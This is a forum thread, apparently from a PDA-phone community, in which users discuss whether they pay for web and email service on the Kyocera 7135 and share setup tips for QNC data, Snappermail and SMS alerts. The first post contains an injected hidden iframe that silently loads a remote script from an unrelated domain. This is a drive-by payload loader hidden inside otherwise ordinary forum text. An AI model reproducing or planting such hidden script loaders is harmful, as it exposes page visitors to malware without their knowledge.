Poll: Are you using email/web on the 7135?

+ Reply to Thread

How many are using web/email ?

Just curious. Web/email costs about $5/month here extra. At this point, I'm not signing up for it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I had signed up for EN with 400 minutes for the first three months but found that it was just too slow to really be of use to me so I cut back to an America's Choice plan. I used it but only for the Gadget factor. I decided to rather save the $20 a month.

If you are referring to "Mobile Web", you don't have to get that to have QNC data access. Set up your phone for a QNC network connection according to the faqs here, and then try to call in. If it works, then you'll just have the time charged against your bucket of minutes. If it doesn't, just call Verizon CS and tell them you need data activated on your account. Mobile Web is just a WAP portal and stuff that you don't need for the 7135.
    ---------------
    The same thing we do every night, Pinky...

Mac OS X user
    I do use e-mail, but it's mostly to e-mail myself reminders about something.
    - Paul

I can't even get the stupid EIS web to work on my phone. I have tried everything. I may have to go into the store again. I got connected using the Browser and I have recieved an text message. So something is working. I believe something is wrong with the PPP connection but I have no idea how to fix it.

Artkazi

There is an excellent FAQ on setting up for QNC. Worked like a charm for me.

GM

I use email (incoming and outgoing via Snappermail) many times a day.

I use GopherKing to send me an SMS alert whenever I get an email in any of my accounts, then I know to download the actual emails via Snappermail.

But I almost never ever use the web capabilities on the 7135. It just doesn't seem worth it to me. Small and slow. But I know that a lot of other folks (i.e. Robert K.) do.
    ~'kito
    pdaPhoneHome Moderator